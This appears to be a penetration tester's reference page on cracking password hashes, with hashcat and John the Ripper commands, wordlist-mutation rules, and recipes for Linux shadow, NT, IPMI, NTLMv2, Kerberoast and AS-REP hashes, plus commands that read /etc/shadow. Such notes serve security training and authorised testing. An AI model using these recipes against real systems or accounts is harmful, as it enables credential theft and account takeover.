Hashes

Online Databases

  • LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)), QubesV3.1BackupDefaults

LogoCrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.
CrackStation

  • NT Hash (SAM)

LogoNTLM to plaintext password lookupNTLM.PW
NTLM.PW

Unix password

/etc/shadow

cry0l1t3

:

$6$wBRzy$...SNIP...x9cDWUxW1

:

18937

:

0

:

99999

:

7

:

:

:

Username

Encrypted password

Last PW change

Min. PW age

Max. PW age

Warning period

Inactivity period

Expiration date

Unused

$<type>$<salt>$<hashed>

ID

Cryptographic Hash Algorithm

$1$

MD5

$2a$

Blowfish

$2y$

Eksblowfish

$5$

SHA-256

$6$

SHA-512

$sha1$

SHA1crypt

$y$

Yescrypt

$gy$

Gost-yescrypt

$7$

Scrypt

$argon2i$...

Argon2

Crack /etc/shadow hashes

cat hash             
user:$1$CrackMe$U93**********UP9iUxGVIvq/:18439:0:99999:7:::
john hash --wordlist=/usr/share/wordlists/rockyou.txt

Hash Identifier

LogoGitHub - blackploit/hash-identifier: Software to identify the different types of hashes used to encrypt data and especially passwordsGitHub
Hash-Identifier

Online:

LogoHash Type Identifier - Identify unknown hashes
root:x:0:0:root:/root:/bin/bash

See Privilege escalation - Linux

Linux

/etc/passwd

$ cat /etc/passwd

...SNIP...
htb-student:x:1000:1000:,,,:/home/htb-student:/bin/bash

htb-student:

x:

1000:

1000:

,,,:

/home/htb-student:

/bin/bash

<username>:

<password>:

<uid>:

<gid>:

<comment>:

<home directory>:

<cmd executed after logging in>

Cracking Linux Credentials

Unshadow

$ sudo cp /etc/passwd /tmp/passwd.bak 
$ sudo cp /etc/shadow /tmp/shadow.bak 
$ unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

Create custom password list

Username listsPassword lists
for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done > pwd.txt

Hashcat generating rule-based Wordlist

$ cat custom.rule

:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@
$ hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
$ cat mut_password.list

password
Password
passw0rd
Passw0rd
p@ssword
P@ssword
P@ssw0rd
password!
Password!
passw0rd!
p@ssword!
Passw0rd!
P@ssword!
p@ssw0rd!
P@ssw0rd!

Hashcat Existing Rules

$ ls /usr/share/hashcat/rules/

best64.rule                  specific.rule
combinator.rule              T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
d3ad0ne.rule                 T0XlC-insert_space_and_special_0_F.rule
dive.rule                    T0XlC-insert_top_100_passwords_1_G.rule
generated2.rule              T0XlC.rule
generated.rule               T0XlCv1.rule
hybrid                       toggles1.rule
Incisive-leetspeak.rule      toggles2.rule
InsidePro-HashManager.rule   toggles3.rule
InsidePro-PasswordsPro.rule  toggles4.rule
leetspeak.rule               toggles5.rule
oscommerce.rule              unix-ninja-leetspeak.rule
rockyou-30000.rule

Try best64.rule first

OneRuleToRuleThemAll

LogoOne Rule to Rule Them AllNotSoSecure
LogoGitHub - NotSoSecure/password_cracking_rules: One rule to crack all passwords. or atleast we hope so.GitHub

Crunch

LogoWordlist Generator using Crunch [6 Methods] | GoLinuxCloudGoLinuxCloud
Password lists

Cupp

LogoGitHub - Mebus/cupp: Common User Passwords Profiler (CUPP)GitHub
Password lists

CeWL

$ cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
$ wc -l inlane.wordlist

326
Password lists

Improve the custom wordlist

As we all know few password are just simple words. Many use numbers and special characters. To improve our password list we can use john the ripper. We can input our own rules, or we can just use the standard john-the-ripper rules

john ---wordlist=inlane.wordlist --rules --stdout > wordlist-modified.txt

Source: https://github.com/lamontns/pentest/blob/master/password-related-attacks/generating-custom-password-lists.md

John The Ripper

$ john --format=<hash_type> <hash or hash_file>

John will output the cracked passwords to the console and the file "john.pot" (~/.john/john.pot) to the current user's home directory.

Hash Format

Example Command

Description

afs

john --format=afs hashes_to_crack.txt

AFS (Andrew File System) password hashes

bfegg

john --format=bfegg hashes_to_crack.txt

bfegg hashes used in Eggdrop IRC bots

bf

john --format=bf hashes_to_crack.txt

Blowfish-based crypt(3) hashes

bsdi

john --format=bsdi hashes_to_crack.txt

BSDi crypt(3) hashes

crypt(3)

john --format=crypt hashes_to_crack.txt

Traditional Unix crypt(3) hashes

des

john --format=des hashes_to_crack.txt

Traditional DES-based crypt(3) hashes

dmd5

john --format=dmd5 hashes_to_crack.txt

DMD5 (Dragonfly BSD MD5) password hashes

dominosec

john --format=dominosec hashes_to_crack.txt

IBM Lotus Domino 6/7 password hashes

EPiServer SID hashes

john --format=episerver hashes_to_crack.txt

EPiServer SID (Security Identifier) password hashes

hdaa

john --format=hdaa hashes_to_crack.txt

hdaa password hashes used in Openwall GNU/Linux

hmac-md5

john --format=hmac-md5 hashes_to_crack.txt

hmac-md5 password hashes

hmailserver

john --format=hmailserver hashes_to_crack.txt

hmailserver password hashes

ipb2

john --format=ipb2 hashes_to_crack.txt

Invision Power Board 2 password hashes

krb4

john --format=krb4 hashes_to_crack.txt

Kerberos 4 password hashes

krb5

john --format=krb5 hashes_to_crack.txt

Kerberos 5 password hashes

LM

john --format=LM hashes_to_crack.txt

LM (Lan Manager) password hashes

lotus5

john --format=lotus5 hashes_to_crack.txt

Lotus Notes/Domino 5 password hashes

mscash

john --format=mscash hashes_to_crack.txt

MS Cache password hashes

mscash2

john --format=mscash2 hashes_to_crack.txt

MS Cache v2 password hashes

mschapv2

john --format=mschapv2 hashes_to_crack.txt

MS CHAP v2 password hashes

mskrb5

john --format=mskrb5 hashes_to_crack.txt

MS Kerberos 5 password hashes

mssql05

john --format=mssql05 hashes_to_crack.txt

MS SQL 2005 password hashes

mssql

john --format=mssql hashes_to_crack.txt

MS SQL password hashes

mysql-fast

john --format=mysql-fast hashes_to_crack.txt

MySQL fast password hashes

mysql

john --format=mysql hashes_to_crack.txt

MySQL password hashes

mysql-sha1

john --format=mysql-sha1 hashes_to_crack.txt

MySQL SHA1 password hashes

NETLM

john --format=netlm hashes_to_crack.txt

NETLM (NT LAN Manager) password hashes

NETLMv2

john --format=netlmv2 hashes_to_crack.txt

NETLMv2 (NT LAN Manager version 2) password hashes

NETNTLM

john --format=netntlm hashes_to_crack.txt

NETNTLM (NT LAN Manager) password hashes

NETNTLMv2

john --format=netntlmv2 hashes_to_crack.txt

NETNTLMv2 (NT LAN Manager version 2) password hashes

NEThalfLM

john --format=nethalflm hashes_to_crack.txt

NEThalfLM (NT LAN Manager) password hashes

md5ns

john --format=md5ns hashes_to_crack.txt

md5ns (MD5 namespace) password hashes

nsldap

john --format=nsldap hashes_to_crack.txt

nsldap (OpenLDAP SHA) password hashes

ssha

john --format=ssha hashes_to_crack.txt

ssha (Salted SHA) password hashes

NT

john --format=nt hashes_to_crack.txt

NT (Windows NT) password hashes

openssha

john --format=openssha hashes_to_crack.txt

OPENSSH private key password hashes

oracle11

john --format=oracle11 hashes_to_crack.txt

Oracle 11 password hashes

oracle

john --format=oracle hashes_to_crack.txt

Oracle password hashes

pdf

john --format=pdf hashes_to_crack.txt

PDF (Portable Document Format) password hashes

phpass-md5

john --format=phpass-md5 hashes_to_crack.txt

PHPass-MD5 (Portable PHP password hashing framework) password hashes

phps

john --format=phps hashes_to_crack.txt

PHPS password hashes

pix-md5

john --format=pix-md5 hashes_to_crack.txt

Cisco PIX MD5 password hashes

po

john --format=po hashes_to_crack.txt

Po (Sybase SQL Anywhere) password hashes

rar

john --format=rar hashes_to_crack.txt

RAR (WinRAR) password hashes

raw-md4

john --format=raw-md4 hashes_to_crack.txt

Raw MD4 password hashes

raw-md5

john --format=raw-md5 hashes_to_crack.txt

Raw MD5 password hashes

raw-md5-unicode

john --format=raw-md5-unicode hashes_to_crack.txt

Raw MD5 Unicode password hashes

raw-sha1

john --format=raw-sha1 hashes_to_crack.txt

Raw SHA1 password hashes

raw-sha224

john --format=raw-sha224 hashes_to_crack.txt

Raw SHA224 password hashes

raw-sha256

john --format=raw-sha256 hashes_to_crack.txt

Raw SHA256 password hashes

raw-sha384

john --format=raw-sha384 hashes_to_crack.txt

Raw SHA384 password hashes

raw-sha512

john --format=raw-sha512 hashes_to_crack.txt

Raw SHA512 password hashes

salted-sha

john --format=salted-sha hashes_to_crack.txt

Salted SHA password hashes

sapb

john --format=sapb hashes_to_crack.txt

SAP CODVN B (BCODE) password hashes

sapg

john --format=sapg hashes_to_crack.txt

SAP CODVN G (PASSCODE) password hashes

sha1-gen

john --format=sha1-gen hashes_to_crack.txt

Generic SHA1 password hashes

skey

john --format=skey hashes_to_crack.txt

S/Key (One-time password) hashes

ssh

john --format=ssh hashes_to_crack.txt

SSH (Secure Shell) password hashes

sybasease

john --format=sybasease hashes_to_crack.txt

Sybase ASE password hashes

xsha

john --format=xsha hashes_to_crack.txt

xsha (Extended SHA) password hashes

zip

john --format=zip hashes_to_crack.txt

ZIP (WinZip) password hashes

john --wordlist=<wordlist_file> --rules <hash_file>

John - SHA-256

john --format=sha256 hashes_to_crack.txt

Hashcat

Hashcat - Generic hash types

Logoexample_hashes [hashcat wiki]
hashcat --example-hashes | less

Crunch Wordlist Generator - Create Single Characters

LogoCrunch Wordlist Generator - Create Single Characters
crunch 12 12 -f "/usr/share/crunch/charset.lst" mixalpha-numeric-all -t abracadabra@

With bash:

for i in {1..20}; do echo "password$i"; done

SHA1

echo 'd033e22ae348aeb5660fc2140aec35850c4da997' > admin_hash_sha1.txt 
hashcat --hash-type 100 --attack-mode 0 admin_hash_sha1.txt /usr/share/wordlists/rockyou.txt

IPMI

IPMI (623 UDP)

General

LogoGitHub - c0rnf13ld/ipmiPwner: Exploit to dump ipmi hashesGitHub
hashcat -m 7300 ipmi.txt
python3 ipmipwner.py --host 10.129.154.218 -u admin -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash

HP iLO

hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

Exegol: 

hashcat -m 7300 ipmi.txt -a 3 '\?1\?1\?1\?1\?1\?1\?1\?1' -1 '?d?u'

SAM - NT hash

$ sudo vim hashestocrack.txt

64f12cddaa88057e06a81b54e73b949b
31d6cfe0d16ae931b73c59d7e0c089c0
6f8c3f4d3869a10f3b4f0522f537fd33
184ecdda8cf1dd238d438c4aea4d560d
f7eb9c06fafaa23c4bcf22ba6781c1e2
sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

Online

LogoNTLM to plaintext password lookupNTLM.PW

MD5

hashcat -m 500 -a 0 md5-hashes.list rockyou.txt

Mysql bcrypt Blowfish (Unix) $2*$

MySQL (3306)
echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > hash           
hashcat --hash-type 3200 --attack-mode 0 hash `fzf-wordlists`

NTMLv2 - Responder

LLMNR NBT-NS Poisoning
[SMB] NTLMv2-SSP Hash     : mssqlsvc::WIN-02:1122334455667788:67469E50D72CBD81C0555BA21EBEB8E2:010100000000000000A3B0E53898DA01B9CD8682359BA70F0000000002000800460030004100470001001E00570049004E002D004600490037003800360032004B00420052004F00500004003400570049004E002D004600490037003800360032004B00420052004F0050002E0046003000410047002E004C004F00430041004C000300140046003000410047002E004C004F00430041004C000500140046003000410047002E004C004F00430041004C000700080000A3B0E53898DA0106000400020000000800300030000000000000000000000000300000182E238D049AA0230066AE7B95F47CA65F370AC3AD06C2810BBFBB25BE72ACFD0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00390036000000000000000000
exit
[+] Exiting...
hashcat -m 5600 mssqlsvc_hash passwords.list

Kerberoast - SPN

Kerberoast

$krb5tgs$23$*: RC4 (type 23) encrypted ticket

$krb5tgs$18$*: AES-256 (Type 18)

While it is possible to crack AES-128 (type 17) and AES-256 (type 18) TGS tickets using Hashcat, it will typically be significantly more time consuming than cracking an RC4 (type 23) encrypted ticket

$krb5tgs$23$

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt

If extracted with Mimikatz - Also see Internal Pentest - Kerberoast

python2.7 kirbi2john.py sqldev.kirbi

This will create a file called crack_file.

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

$krb5tgs$18$

hashcat -m 19700 aes_to_crack /usr/share/wordlists/rockyou.txt

ASREPRoast

Misconfiguration
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt
PreviousCrackingNextFiles - Encrypted

Last updated